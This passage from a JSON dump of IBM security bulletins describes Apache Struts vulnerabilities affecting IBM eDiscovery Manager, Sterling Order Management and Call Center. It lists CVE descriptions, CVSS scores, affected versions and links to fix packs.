008](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FInfoSphere+eDiscovery+Manager&fixids=2.2.2.3-EDM-WIN-IF008&source=SAR> \"Interim Fix 008\" ) for Windows\n\nUse IBM eDiscovery Manager 2.2.2.3 [Interim Fix 008](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FInfoSphere+eDiscovery+Manager&fixids=2.2.2.3-EDM-AIX-IF008&source=SAR> \"Interim Fix 008\" ) for AIX \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-12T10:00:46", "type": "ibm", "title": "Security Bulletin: Multiple Vulnerabilities in Apache Struts Affect IBM eDiscovery Manager", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233", "CVE-2020-17530", "CVE-2021-31805"], "modified": "2023-07-12T10:00:46", "id": "80737D4B4CE626670083B16CA387FEFAC8045ECB16DACD55AD56FFAC544F21A4", "href": "https://www.ibm.com/support/pages/node/7011373", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-08T02:42:32", "description": "## Summary\n\nApache Struts is used by IBM Sterling Order Management as part of its web application framework used for creating Java EE web applications . We recommend upgrading to the latest supported version of Struts that was released as part of the latest FixPack 29.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2011-1772](<https://vulners.com/cve/CVE-2011-1772>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by Xwork when generating the action name for error pages. If Dynamic Method Invocation is enabled, a remote attacker could exploit this vulnerability using the tag in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 2.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/67354](<https://exchange.xforce.ibmcloud.com/vulnerabilities/67354>) for the current score. \nCVSS Vector: (AV:N/AC:H/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-0838](<https://vulners.com/cve/CVE-2012-0838>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the evaluation of an OGNL expression during a conversion error. An attacker could exploit this vulnerability using invalid input to a field to modify run-time data and execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/73690](<https://exchange.xforce.ibmcloud.com/vulnerabilities/73690>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-7809](<https://vulners.com/cve/CVE-2014-7809>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by predictable tokens. By sending a specially crafted request, an attacker could exploit this vulnerability to bypass cross-site request forgery security measures. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/98963](<https://exchange.xforce.ibmcloud.com/vulnerabilities/98963>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2011-5057](<https://vulners.com/cve/CVE-2011-5057>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to block access to the session map by the org.apache.struts2.interceptor.SessionAware or org.apache.struts2.interceptor.RequestAware interfaces. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to modify the session map. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/71654](<https://exchange.xforce.ibmcloud.com/vulnerabilities/71654>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-4387](<https://vulners.com/cve/CVE-2012-4387>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an error when handling request parameters. A remote attacker could exploit this vulnerability using a specially-crafted parameter name containing an OGNL expression to consume all available CPU resources. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/78183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/78183>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n \n** CVEID: **[CVE-2012-1006](<https://vulners.com/cve/CVE-2012-1006>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the editPerson.action and struts2-rest-showcase/orders scripts. A remote attacker could exploit this vulnerability using the name, lastName or clientNape parameter in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72888](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72888>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-0392](<https://vulners.com/cve/CVE-2012-0392>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by the failure to properly restrict access to static methods by the CookieInterceptor class. An attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72088](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72088>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-0094](<https://vulners.com/cve/CVE-2014-0094>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in ParametersInterceptor. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92205](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92205>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2013-1965](<https://vulners.com/cve/CVE-2013-1965>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error in the Apache Struts Showcase App. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary code on the system. \nCVSS Base score: 6.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85573](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85573>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-0112](<https://vulners.com/cve/CVE-2014-0112>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to ParametersInterceptor and the failure to restrict access to the class parameter. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92740](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92740>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2134](<https://vulners.com/cve/CVE-2013-2134>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84762](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84762>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2016-3081](<https://vulners.com/cve/CVE-2016-3081>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the passing of a malicious expression when Dynamic Method Invocation is enabled. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 5.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/112528](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112528>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2014-0113](<https://vulners.com/cve/CVE-2014-0113>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to CookieInterceptor and the failure to restrict access to the getClass() method. An attacker could exploit this vulnerability using CookieInterceptor when configured to accept all cookies to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92742](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92742>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2135](<https://vulners.com/cve/CVE-2013-2135>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84763](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84763>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2013-4316](<https://vulners.com/cve/CVE-2013-4316>) \n** DESCRIPTION: **An unspecified error in Apache Struts related to the default enabling of Dynamic Method Invocation (DMI) could lead to remote code execution. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/87373](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87373>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n** CVEID: **[CVE-2012-0391](<https://vulners.com/cve/CVE-2012-0391>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by the interpretation of parameter values as OGNL expressions by the ExceptionDelegator command. An attacker could exploit this vulnerability using a specially-crafted parameter to execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72229](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72229>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2012-0393](<https://vulners.com/cve/CVE-2012-0393>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to traverse directories on the system, caused by the improper validation of input by ParameterInterceptor prior to being used to create files. An attacker could send a specially-crafted URL request containing directory traversal sequences to create or overwrite arbitrary files on the system. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72089](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72089>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-4386](<https://vulners.com/cve/CVE-2012-4386>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site request forgery, caused by improper validation of the token name configuration parameter by the token handling mechanism. By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to perform unauthorized actions. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/78182](<https://exchange.xforce.ibmcloud.com/vulnerabilities/78182>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2016-4003](<https://vulners.com/cve/CVE-2016-4003>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the URLDecoder implementation. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/111514](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111514>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2016-3093](<https://vulners.com/cve/CVE-2016-3093>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by the improper implementation of cache used to store method references by the OGNL expression language. An attacker could exploit this vulnerability to block access to a Web site. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/113686](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113686>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2013-4310](<https://vulners.com/cve/CVE-2013-4310>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the action: parameter prefix. An attacker could exploit this vulnerability to gain unauthorized access to the system. \nCVSS Base score: 5.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/87336](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87336>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N) \n \n** CVEID: **[CVE-2014-0116](<https://vulners.com/cve/CVE-2014-0116>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to properly restrict access to the getClass() method by the CookieInterceptor class. An attacker could exploit this vulnerability to manipulate the ClassLoader used by the application server. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/93024](<https://exchange.xforce.ibmcloud.com/vulnerabilities/93024>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2010-1870](<https://vulners.com/cve/CVE-2010-1870>) \n** DESCRIPTION: **XWork, as used in Apache Struts, FishEye and Crucible, could allow a remote attacker to bypass security restrictions, caused by an error in the ParameterInterceptor class. An attacker could exploit this vulnerability using specially-crafted OGNL (Object-Graph Navigation Language) expressions to modify server-side objects and possibly execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/60371](<https://exchange.xforce.ibmcloud.com/vulnerabilities/60371>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2016-3082](<https://vulners.com/cve/CVE-2016-3082>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of XSLTResult to parse arbitrary stylesheet. An attacker could exploit this vulnerability to inject and execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/112527](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112527>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2016-4436](<https://vulners.com/cve/CVE-2016-4436>) \n** DESCRIPTION: **An unspecified error Apache Struts related to the method used to clean up action name has an unknown impact and attack vector. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/114183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2013-2251](<https://vulners.com/cve/CVE-2013-2251>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating the action:, redirect:, and redirectAction: parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary commands on the system. Note: This vulnerability affects other products. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85756](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85756>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2017-12611](<https://vulners.com/cve/CVE-2017-12611>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of an unintentional expression in Freemarker tag instead of string literals. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/131603](<https://exchange.xforce.ibmcloud.com/vulnerabilities/131603>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2015-5209](<https://vulners.com/cve/CVE-2015-5209>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to gain unauthorized access to the system. An attacker could exploit this vulnerability using a special top-level object to manipulate internal settings and modify another user session. \nCVSS Base score: 9.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/106695](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106695>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) \n \n** CVEID: **[CVE-2013-2115](<https://vulners.com/cve/CVE-2013-2115>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an incomplete fix for an error related to the handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84543](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84543>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-1966](<https://vulners.com/cve/CVE-2013-1966>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restriction, caused by the improper handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject OGNL code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84542](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84542>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2248](<https://vulners.com/cve/CVE-2013-2248>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to conduct phishing attacks, caused by an open redirect vulnerability in the DefaultActionMapper class. An attacker could exploit this vulnerability using the redirect: and redirectAction:: parameters in a specially-crafted URL to redirect a victim to arbitrary Web sites. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85755](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85755>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2015-2992](<https://vulners.com/cve/CVE-2015-2992>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when directly accessing JSP files. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/106172](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106172>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2015-5169](<https://vulners.com/cve/CVE-2015-5169>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when debug mode is enabled. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/105879](<https://exchange.xforce.ibmcloud.com/vulnerabilities/105879>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Order Management| 10.0 \nIBM Sterling Order Management| 9.5.x \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading to the latest fixpack that has the upgraded version of Apache Struts. Please note the fixpack only applies to IBM Sterling Order Management version 10 and if you are running IBM Sterling Order Management version 9.5 a product upgrade must be completed first. IBM Sterling Order Management version 9.5 end of support April 30, 2022.\n\nOrder Management installing Fix Pack29 -[https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version#fp29 https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version#fp30](<https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version#fp29>)\n\nFix Pack 29 download location - [https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=10.0.0.0-Sterling-SSFF-All-fp30-Installer&product=ibm%2FOther%20software%2FSterling%20Selling%20and%20Fulfillment%20Foundation&source=dbluesearch&mhsrc=ibmsearch_a&mhq=10.0.0.0-Sterling-SSFF-All-fp30-Installer%20&function=fixId&parent=ibm/Other%20software](<https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=10.0.0.0-Sterling-SSFF-All-fp30-Installer&product=ibm%2FOther%20software%2FSterling%20Selling%20and%20Fulfillment%20Foundation&source=dbluesearch&mhsrc=ibmsearch_a&mhq=10.0.0.0-Sterling-SSFF-All-fp30-Installer%20&function=fixId&parent=ibm/Other%20software>)\n\nCreating & Extending Struts - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=cesf-creating-extending-struts-xml-file-in-web-ui-framework>\n\nOn-Premise release notes - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version>\n\nFix Central Link (**FP details URL)**: \n[http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR>)\n\n## Workarounds and Mitigations\n\nIBM strongly recommends addressing the vulnerability now by executing above steps in product version 10.0. Version 9.5 is end of support as of April 30, 2022. If you need further clarifications regarding 9.5 end of support, log4j and version 9.5 please contact IBM support.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-14T17:45:15", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management Apache Struts upgrade strategy (various CVEs, see below)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870", "CVE-2011-1772", "CVE-2011-5057", "CVE-2012-0391", "CVE-2012-0392", "CVE-2012-0393", "CVE-2012-0838", "CVE-2012-1006", "CVE-2012-4386", "CVE-2012-4387", "CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251", "CVE-2013-4310", "CVE-2013-4316", "CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113", "CVE-2014-0116", "CVE-2014-7809", "CVE-2015-2992", "CVE-2015-5169", "CVE-2015-5209", "CVE-2016-3081", "CVE-2016-3082", "CVE-2016-3093", "CVE-2016-4003", "CVE-2016-4436", "CVE-2017-12611", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-17530"], "modified": "2022-09-14T17:45:15", "id": "87B4000A01C23B6231C463A8E1B3BEC371361C202F46354684899DC113F12BC8", "href": "https://www.ibm.com/support/pages/node/6620355", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-08T02:42:32", "description": "## Summary\n\nApache Struts is used by IBM Call Center as part of its web application framework used for creating Java EE web applications. It is vulnerable to various CVEs, listed below. We recommend upgrading to the latest supported version of Struts that was released as part of the latest FixPack 12.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2011-1772](<https://vulners.com/cve/CVE-2011-1772>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by Xwork when generating the action name for error pages. If Dynamic Method Invocation is enabled, a remote attacker could exploit this vulnerability using the tag in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 2.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/67354](<https://exchange.xforce.ibmcloud.com/vulnerabilities/67354>) for the current score. \nCVSS Vector: (AV:N/AC:H/Au:N/C:N/I:P/A:N) \n \n** CVEID: 